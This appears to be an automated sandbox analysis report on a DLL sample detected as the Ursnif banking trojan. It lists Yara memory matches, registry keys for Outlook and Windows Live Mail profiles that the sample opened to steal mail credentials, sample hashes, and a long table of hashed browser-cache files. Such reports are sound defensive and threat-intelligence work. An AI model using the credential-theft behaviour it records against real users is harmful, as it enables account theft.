Source: Yara match	File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

Tries to steal Mail credentials (via file access)

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

ID:	353243
Product:	CloudBasic
Start time:	21:25:07
Start date:	15.02.2021
Sample:	NJPcHPuRcG.dll
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	48ac334e786156ef605b82dd563373f4
SHA1:	1710cf3539eaaf618a613e690157adf30550fade
SHA256:	71b928fd0b29e21bbfa4755b5347f4dc40653a82ec7ecf4947e325dbec23abaa
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DURNCK2N\www.msn[2].xml	ASCII text, with no line terminators	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\QALADACS\contextual.media[1].xml	ASCII text, with very long lines, with no line terminators	4002DB67F61887BCA5898C7997AC014C	2E587DB846AF0FDCF4D743019F72DB389DAB917F	AE3EEBB15C9EDF6CF865B12F4A49A1412593CD3D36D644A7AC32ABB299479773
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{75BD31D2-7017-11EB-90E5-ECF4BB570DC9}.dat	Microsoft Word Document	D420899BEEE44BD14AA77B5D83D105F9	631FA2669185BC3D5BFB987EF86B32F84EBBFE38	2C35FCB224B152E0F731040DC76B553674B9FFA4D18EA8EC0A4D8D694C5CC462
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{75BD31D4-7017-11EB-90E5-ECF4BB570DC9}.dat	Microsoft Word Document	2C0FCAD5AFD9BA9EC507824C8ADBE212	66C3D4158ED59F2E89DF1F3C23E4574AC264E141	88DAFA665A36D0A9F8F19327F642AB2250F02778CB0DF65B1B6672B21556C201
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8CCE525F-7017-11EB-90E5-ECF4BB570DC9}.dat	Microsoft Word Document	3AAEB9337106F1A7AB89D5BCD970658C	377AF013931328C63D11F3F87ED803DC3D665C7D	2D7B641649F49FCBF183F54816B20EA00AA8B420D6EB47D20986A97C057AD756
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8CCE5261-7017-11EB-90E5-ECF4BB570DC9}.dat	Microsoft Word Document	BE96385D153AFE49884FA03BDC5CFB96	2A9E7E7EDFBB8ED7008D7BA40411A49620712D8C	6DFF5555C415C52EFE5112E6B8346D3918DF9FD098F0DB580D7CE00B72067206
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8CCE5263-7017-11EB-90E5-ECF4BB570DC9}.dat	Microsoft Word Document	3F2D1D72B7A639775AA6071E31013D5B	30258AB053BE2CCAF1A3B299A44AD4B21761A41F	447DBBB78248E4E68E531EC6D78F41680632E281DA0B11037B6D1E882F08441F
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	26421A59E71CF110E4AC15E5F656DD3F	172FF7C049329F1F75CAB3F17E476F471A0321FD	756FC747DEAD21ECDDAA3D1790AA179AF440F81F907D96DC2703E50B424D6E35
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	F336536B5D1CE5BBCE97C055719011CE	27836D16DBEFE80112427579D0232494DC798DF9	527449C7093524404B88BF288C6FF2F7EF4A4EE7A82007AADC36D122270B5E91
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	A1E24723860EE0037651143F9D068D59	49BE561D08BF3399A4677DFCB7D2E0BB27D44F70	1928298172506081F86FACF136EB9826DBB6E64EA33896878B6E740672D25BAB
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	3B529125BD6379006CDA7C1A5ED37F7C	0D3E7995A50F0BF28510B56BC96F695607263F9B	A101BF6A09028047BBB050480E67881D532913AF6EDA017FF7B3F7B625686F1E
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	BC08ABFC16F82A8403E7B707F5D7D546	F00E7F1D5C385B42E5A22F9825ED2B1577293FA1	FB378A7246765CDC16BC4A3E1D8278E36D8DC24B9181183E4A7555BB72A9AFE0
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	AAA0C78C3A42B1558E7FCA987129183E	F9EDE5CF8DC9E6D792DF9784F252A5333A7A74FD	4E54F244C560E3E91010A584E28DAF3CD189A868A8578AB270B4F4DADB3ECB3E
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	EF35A6985C8C2E2A68D250D2A31D3545	AE4F096F2E1053FEE92C605492B0A42D1C5A2B7C	1E22DECB5AF48708EE5871F3B82730689CCD0814E33C1333504AA9A4D72E0676
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	73A49C0F3ECF88727F63073500865D37	95F1DE28709DBC0216817878CD3E78FEB0055568	BA5D7E5A1098CA7189DA0CDBCEA4EE2D107B4A34B91B550900670AF5AB365A79
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	D7930AEC8390D7629B4FEF5D2DA8679F	8684FB0C9ACB820F99817EB86D78DDB870A8EECF	844BB71BE02CBEFE6BD357557C1483B63205E63428CE2BED38423A621A10F2BF
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat	data	BD4BE4B99A6768DFBA149F8BDC4091BB	61D2564C4D1C7EB1E9111A2DE02EB6D2B803914E	E274AA8419A5BDCF4B271BDA0A30842B452DD581E6A824A759B05907A25807D5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\55a804ab-e5c6-4b97-9319-86263d365d28[1].json	ASCII text, with very long lines, with no line terminators	1B9097304D51E69C8FF1CE714544A33B	3D514A68D6949659FA28975B9A65C5F7DA2137C3	9B691ECE6BABE8B1C3DE01AEB838A428091089F93D38BDD80E224B8C06B88438
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AA6SFRQ[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	C03FB66473403A92A0C5382EE1EFF1E1	FCBD6BF6656346AC2CDC36DF3713088EFA634E0B	CF7BEEC8BF339E35BE1EE80F074B2F8376640BD0C18A83958130BC79EF12A6A3
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AAJwj2L[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 622x368, frames 3	5579CC5F6C9B9A4332A0AF253CDC3529	FC3A84375A1AA490AF4BF60CDB197B720B4C2DAB	3DEB34D237C43B390F47D66AA24037A3AD453C600BAE3595DFBC8AEC15AF18AD
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AArXDyz[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	869C1A1A5B3735631C0B89768DF842DE	C9D4875B46B149F45D60ED79D942D3826B50C0E9	2973B8D67C9149EE00D9954BFAF1F7AAA728EF04FB588A626A253AC0A87554A6
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB14EN7h[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, baseline, precision 8, 622x368, frames 3	A1ED4EB0C8FE2739CE3CB55E84DBD10F	7A185F8FF5FF1EC11744B44C8D7F8152F03540D5	17917B48CF2575A9EA5F845D8221BFBC2BA2C039B2F3916A3842ECF101758CCB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1cG73h[1].png	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced	3867568E0863CDCE85D4BF577C08BA47	F7792C1D038F04D240E7EB2AB59C7E7707A08C95	BE47B3F70A0EA224D24841CB85EAED53A1EFEEFCB91C9003E3BE555FA834610F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1dHBnn[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 206x250, frames 3	7316FE4BF8ABB97B47DC405E82C86191	D65110C1810FB0E9BD3B4C5A2B5E3F9047B3A55E	21B3C5C5CC965197169C967F809D18FDEA661CDDCC4C863596B2E1546F0483DC
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1dHF9j[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3	60BCCF0009FFB8BEB50E44174976098C	4144C0C2143A6E4731DF123D1C881A2610ADFB47	9E3E63F5A0253373BDE49CC5BAECC71931ECD08CB591DCBA804DD0CF8B25DDA1
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1dHiBL[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 100x75, frames 3	29968292C14A3FBAB693014EC21786F2	C9905F37DF29833A82B456668C06877FB134A678	A4100B8F6F9DCF594D77BE9893D8A41C91F5BEDBAD12E2239F617A3C364FCA2F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1dHsjP[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 100x75, frames 3	EF82FC1D87910D73D53C124DB6B58A81	37E8E10BC9E3C0A7CB9FDCA14467732310D3BE89	86B7A62791EBFA660B446F2339409890B804403AADDF6184C2A70AECB8244E8B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1dHwGP[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3	A8900197DD062A7BB5A4331AE06068EE	0C37AF6D54D562D5169225A280E4F0D3C835899A	E66B0D34D56D6DDA1EF6891D88FCE635296760017828D6EA0E88A4481E54B33D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1dHxEf[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 311x333, frames 3	1AD5015C9B4C6E22BA7D23158297A223	D52A7E43D0EC61E1C1E65630680E700668C6660D	A99BB121F2051AF1495C73159485EE389B8EED9519E574AAABE435BACD9D768F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1dHxqE[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 300x250, frames 3	DBA78C48EA6D6CC9879CE06BAE974351	BD67B235ED1AE24191E91521B67B324415584590	6F38A166D9DB13D34D1A24025A1A881FC1E4350A4268654D6F984796215CED12
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BB1dHyAs[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, baseline, precision 8, 311x333, frames 3	E7E206EF14A3B490BB30DE9149B7949B	E71B83FCEA5082A8EE6F13B72EE6B0A3B5E93D7E	B98268475BC4D47A3ABEE343CB4A3A08F41D6FF6C70730D9675384313147E995
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BBIbTiS[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	9B7529DFB9B4E591338CBD595AD12FF7	0A127FA2778A1717D86358F59D9903836FCC602E	F1A3EA0DF6939526DA1A6972FBFF8844C9AD8006DE61DD98A1D8A2FB52E1A25D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BBX2afX[1].png	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced	09A4FCF1442AD182D5E707FEBC1A665F	34491D02888B36F88365639EE0458EDB0A4EC3AC	BE265513903C278F9C6E1EB9E4158FA7837A2ABAC6A75ECBE9D16F918C12B536
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\checksync[1].htm	HTML document, ASCII text, with very long lines	97A17EFCA6ECAE418CACBBF6AE41B0B1	31235CDB60298018C1C0D1EFE712FF3281A7B29B	00FFE70B03F4DF3A0D653D15DF9DB3D4451AD931953B44F9541DD59D8538FD90
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\checksync[2].htm	HTML document, ASCII text, with very long lines	97A17EFCA6ECAE418CACBBF6AE41B0B1	31235CDB60298018C1C0D1EFE712FF3281A7B29B	00FFE70B03F4DF3A0D653D15DF9DB3D4451AD931953B44F9541DD59D8538FD90
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\checksync[3].htm	HTML document, ASCII text, with very long lines	97A17EFCA6ECAE418CACBBF6AE41B0B1	31235CDB60298018C1C0D1EFE712FF3281A7B29B	00FFE70B03F4DF3A0D653D15DF9DB3D4451AD931953B44F9541DD59D8538FD90
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\checksync[4].htm	HTML document, ASCII text, with very long lines	97A17EFCA6ECAE418CACBBF6AE41B0B1	31235CDB60298018C1C0D1EFE712FF3281A7B29B	00FFE70B03F4DF3A0D653D15DF9DB3D4451AD931953B44F9541DD59D8538FD90
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\http___cdn.taboola.com_libtrc_static_thumbnails_199655af051ff7c0f5750635e94a1c08[1].jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3	AB6CAD136C683AFFDD2E13F6FF9D8064	C64BC83FD3154EE63845D9F882C8C44C9B7F8D30	DFD4CCBBA01062D701E1B75DC0AB53FE0198123617B4E377DDF9101FE7C0C9FF
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\http___cdn.taboola.com_libtrc_static_thumbnails_5c49d96e95caf0260d3f4c61945806e3[1].jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3	CCC6D094C2738F6C42ADA3712FD33F93	22D391E417E8000F3DBD05F1A095C9D6EABFAB4B	0BA81DFD3E2119A8442AA42F611BE0D59238A4CCA49C2D7F06803AD81D44C005
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\http___cdn.taboola.com_libtrc_static_thumbnails_679ad616136b16daf68b19be42b62408[1].jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3	7F51A55E5E783AE24E03D34880C43CBD	F537B439DD49225E5650F58DA6B9074A5EBDDA40	77BBFA1D4DA459FFE4F232DACA53F2AD0768E32E7C3ADB7FC6F934C4CF5B24A1
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\http___cdn.taboola.com_libtrc_static_thumbnails_7b93833687ad80546a194e7eed06c1eb[1].jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3	BB06E9EBDD03FD293BDF280D07FE360B	456F0FA99508077FBCF0A64DB8F75668C0092418	77A9011B083F5379596C19855F18A5DFF7A93B33D2CB62E460670B5204BCEBD9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\http___cdn.taboola.com_libtrc_static_thumbnails_831afd7b16ef15301070d350663f9c7a[1].jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3	CBA5C805BEE81A5DA114F7646613F3FC	587CD288207C2C1F62E43663AD4AC0EAFFF9F87A	A4A7FD3DA82AD14ED5320348B475C6DF8A3838122CFA1C453FE5D314C32811E9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\http___cdn.taboola.com_libtrc_static_thumbnails_e422867e373581902d24ef95be7d4e1b[1].jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3	C4B9684545B9781F5F19A99ECD6A95B5	C25C9E466C46184BE03D654BF13DED7D55E71C1B	845E13CB4404F674F57C712D570BC9E353A2CB742722DA9116F272B9226C71F7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\https___console.brax-cdn.com_creatives_b9476698-227d-4478-b354-042472d9181c_TB1813_1200x800_1000x600_dc50ae7dd7f119b94c09edb195c1bb8e[1].jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3	30939BEFE688393E77D9FB1A40332FD2	3BCDE0BBB03ECE8F53A29583880E1EA598563969	0A74990CF6E3033D3280EFF2A5506AB940B1DF6F48AF49011164129D5B7EEEE0
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\jquery-2.1.1.min[1].js	ASCII text, with very long lines, with CRLF line terminators	9A094379D98C6458D480AD5A51C4AA27	3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E	B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\location[1].js	ASCII text, with no line terminators	C4F67A4EFC37372559CD375AA74454A3	2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56	C72856B40493B0C4A9FC25F80A10DFBF268B23B30A07D18AF4783017F54165DE
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\log[1].gif	GIF image data, version 89a, 1 x 1	349909CE1E0BC971D452284590236B09	ADFC01F8A9DE68B9B27E6F98A68737C162167066	796C46EC10BC9105545F6F90D51593921B69956BD9087EB72BEE83F40AD86F90
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\nrrV67478[1].js	ASCII text, with very long lines, with no line terminators	C2DC0FFE06279ECC59ACBC92A443FFD4	C271908D08B13E08BFD5106EE9F4E6487A3CDEC4	51A34C46160A51FB0EAB510A83D06AA9F593C8BEB83099D066924EAC4E4160BC
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\4996b9[1].woff	Web Open Font Format, TrueType, length 45633, version 1.0	A92232F513DC07C229DDFA3DE4979FBA	EB6E465AE947709D5215269076F99766B53AE3D1	F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\755f86[1].png	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced	D43625E0C97B3D1E78B90C664EF38AC7	27807FBFB316CF79C4293DF6BC3B3DE7F3CFC896	EF651D3C65005CEE34513EBD2CD420B16D45F2611E9818738FDEBF33D1DA7246
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAkqhIf[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	BB846CCC67B5DE204B33CF7B805F59A3	A3301490722FA557F169FAA8283DA926F4393783	9913B44FB1AAF52B9CB0BD7BB4563CAA098BC29D35E2609D4E2A74C4D4026131
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAuTnto[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	BB8DFFDE8ED5C13A132E4BD04827F90B	F86D85A9866664FC1B355F2EC5D6FCB54404663A	D2AAD0826D78F031D528725FDFC71C1DBAA21B7E3CCEEAA4E7EEFA7AA0A04B26
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB10MkbM[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	569B24D6D28091EA1F76257B76653A4E	21B929E4CD215212572753F22E2A534A699F34BE	85A236938E00293C63276F2E4949CD51DFF8F37DE95466AD1A571AC8954DB571
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB14hq0P[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, baseline, precision 8, 622x368, frames 3	A654465EC3B994F316791CAFDE3F7E9C	694A7D7E3200C3B1521F5469A3D20049EE5B6765	2A10D6E97830278A13CD51CA51EC01880CE8C44C4A69A027768218934690B102
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1cEAUp[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 622x368, frames 3	44A18658C601989D66F63DDC9B82AB76	1A4642B218D7AA7503C23F311CB342D9AAAFDD00	23A076A45A2B93E3F78FC80C39C7D69799405F44BB8FEB4A92C91A88F2AECC3A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dHKl9[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3	B1EB8C72739DCFEFCCBCFB1391F34D78	0608E48EEF2D6C6C245D4E83474DF598560ECEA3	7E577BAB251705320E63E76A898F7499AD82BDA1B041C027E843DF680CE02A0A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dHaHG[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3	4552A8E698067AEE24526FDFB04388A4	457F9DA379F4148557B735037395864F0F916804	52AA5CE1C43C0B4EA811E6B0160A69C62AD37F2B86BEDAFE5E18F87C7E6719C4
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dHhCC[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 622x368, frames 3	E7F47955A5668C938A88F73DEA0C591E	DB861310741590C3392C3BFB2B03D4DD7F0FAE80	C731116447CD3B610FBA6817F47ABFF448110F2A5308DFA7B82D0673F2815020
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dHpQ8[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 311x333, frames 3	E34FC5F484E7C8FD39064AB5EDD2EF06	34027795AF4B636A2CD1251B4343C8B5AD7E2F23	17B170C203AA5C0459305776F421B31BBC37DCB48009B8637A59B1AAEEC39F94
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dHrmf[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3	3DBFB59A536D2D2269550A39A06A4652	5FE1BE0F31A31E196D5A767527439A6C05544ED1	5E8C035CDB872282E3EA3C0BDBE6DE635747C289A7892EFB433DF58260C30A3C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dHsRM[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 100x75, frames 3	35BA498D68E7C240DF270DEB903297F5	D176ED7960CA277AE94002419C7C9CE6F78FFA01	5D3665DDEDEED5CAA21D484E09138796B8FFA9D9BCABBFEB66EF8BCC8C72D82A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dHw7A[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 206x250, frames 3	2D49B699C2E959616F35A1ECB1AB6AD0	624ADCD53D2A415E501F7D686B1EF6B2C834524C	4DFF9E6C263AEB667FD6CFDEBA59C5EBB8FF1F68A08DFF335ADB7A3A180EF420
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dHwnn[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3	9C3CE6FEB1E697660064FE30919EDE39	CEB38604F283FA618793E718539652CE42550499	B7CA13319F1463E66EC50C47FE75C11CCF4743A9468313D3483F6FD9183D6246
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dHz8t[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3	C0F54ECA7E3D3D9B53BFD33580477F00	411596FDBDCE19C789173796B50F2DB0CA82BB9D	4A447C9CF36D9353CD9829C026CF65D40887598E2BD9363FB8687ACEB75EA301
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BB1dHzhh[1].jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 100x75, frames 3	5EE9D1E088E4DB3DCA9268C50F813456	B90144849695735A641F0BA7F25C318C75F06DF6	42E7748A909E4D0670B965AE9EC99C91D5A0A22B6115C1967962C6CF44F79D67
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\BBY7ARN[1].png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	7AEA772CD72970BB1C6EBCED8F2B3431	CB677B46C48684596953100348C24FFEF8DC4416	FA59A5A8327DB116241771AFCD106B8B301B10DBBCB8F636003B121D7500DF32
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\F[1].htm	ASCII text, with very long lines, with no line terminators	E924EC561FB47C3C0077569F989E9945	7B779431CDFB4199AB382029420C49A8E7145CBD	620F9E87417B9B64C9CA5D8C86EADC68BE4EFBCD4F829857AA3E88CBCF8FFCEA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\SDOEEBL[1].htm	ASCII text, with very long lines, with no line terminators	A214C9D621F37A4A5DD418FE4B986283	96B4D5DED9599F50A7557A927384A054721496C6	A63A214D997D6A6B91E278F99EE16E9EDD06ABC4C515797838E22B8E59C96784
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\a5ea21[1].ico	PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced	84CC977D0EB148166481B01D8418E375	00E2461BCD67D7BA511DB230415000AEFBD30D2D	BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\auction[1].htm	HTML document, ASCII text, with very long lines	16137394EB177AD5845EE55D9070C3F4	9F935ED4450B7ED81ABCE507517D9FDEAB5F6DCB	FBFAD5303DC9698B197A191C5638AE07DFE61CEDE6172781A15AB1960207A5AB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\f489d89a-0e50-4a68-82ea-aa78359a514f[1].jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3	CF11BAF2E1D8672BBE46055C034BAE56	7305B5298E7EFE304F11C4531A58D40ECD4EA99D	2F7B151005B4E02B04116E540BE590E8C838B5CFE947358993DE63880520D10E
